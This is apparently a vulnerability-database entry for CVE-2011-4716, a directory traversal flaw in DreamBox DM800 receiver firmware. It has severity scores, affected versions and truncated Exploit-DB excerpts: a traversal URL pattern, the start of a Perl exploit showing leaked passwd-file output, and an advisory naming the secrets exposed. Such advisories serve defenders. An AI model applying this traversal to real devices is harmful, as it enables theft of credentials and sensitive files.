CVE-2011-4716
Published: 2011-12-08
Directory traversal vulnerability in file in DreamBox DM800 1.6rc3, 1.5rc1, and earlier allows remote attackers to read arbitrary files via the file parameter.
Priority: P3 (35), medium
CVSS 2.0: 5 (AV:N/AC:L/Au:N/C:P/I:N/A:N)
EXPLOIT
EPSS: 3.53% (87.8th percentile)
Affected
4 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| dream-multimedia-tv | dreambox_dm800_hd_pvr_firmware | — | — |
| dream-multimedia-tv | dreambox_dm800_hd_pvr_firmware | — | — |
| dream-multimedia-tv | dreambox_dm800_hd_se_firmware | <= 1.6 | — |
| dream-multimedia-tv | dreambox_dm800_hd_se_firmware | — | — |
No detection rules found.
Exploit-DB
DreamBox DM800 - 'file' Local File Disclosure
exploitdb·2011-11-04
---
source: https://www.securityfocus.com/bid/50520/info
DreamBox DM800 is prone to a local file-disclosure vulnerability because it fails to adequately validate user-supplied input.
Exploiting this vulnerability would allow an attacker to obtain potentially sensitive information from local files on computers running the vulnerable application. This may aid in further attacks.
DreamBox DM800 versions 1.5rc1 and prior are vulnerable.
http://www.example.com/file/?file=[LFD]
Exploit-DB
DreamBox DM800 1.5rc1 - File Disclosure
exploitdb·2011-11-04
---
#!/usr/bin/perl
# DreamBox DM800 :0:0:root:/home/root:/bin/sh
# daemon:*:1:1:daemon:/usr/sbin:/bin/sh
# bin:*:2:2:bin:/bin:/bin/sh
# sys:*:3:3:sys:/dev:/bin/sh
# sync:*:4:65534:sync:/bin:/bin/sync
# games:*:5:60:games:/usr/games:/bin/sh
# man:*:6:12:man:/var/cache/man:/bin/sh
# lp:*:7:7:lp:/var/spool/lpd:/bin/sh
# mail:*:8:8:mail:/var/mail:/bin/sh
# news:*:9:9:news:/var/spool/news:/bin/sh
# uucp:*:10:10:uucp:/var/spool/uucp:/bin/sh
# proxy:*:13:13:proxy:/bin:/bin/sh
# www-data:*:33:33:www-data:/var/www:/bin/sh
# backup:*:34:34:backup:/var/backups:/bin/sh
# list:*:38:38:Mailing List Manager:/var/list:/bin/sh
# irc:*:39:39:ircd:/var/run/ircd:/bin/sh
# gnats:*:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
# nobody:*:65534:65534:n
Exploit-DB
DreamBox DM800 - Arbitrary File Download
exploitdb·2011-06-21
---
# Exploit Title: [title]
# Date: [date]
# Author: [ShellVision]
# Version: [dm800 <= 1.6rc3]
# Tested on: [dm800 Release 4.6.0 2009-12-24]
DreamBox DM800 Arbitrary File Download Vulnerability
Vendor: Dream Multimedia GmbH
Product web page: http://www.dream-multimedia-tv.de
Affected version: DM800 (may affect other versions)
Summary: The Dreambox is a series of Linux-powered
DVB satellite, terrestrial and cable digital television
receivers (set-top box).
Desc: Dreambox suffers from a file download vulnerability
thru directory traversal with appending the '/' character
in the HTTP GET method of the affected host address. The
attacker can get to sensitive information like paid channel
keys, usernames, passwords, config and plug-ins info, et
No writeups or analysis indexed.
Published: 2011-12-08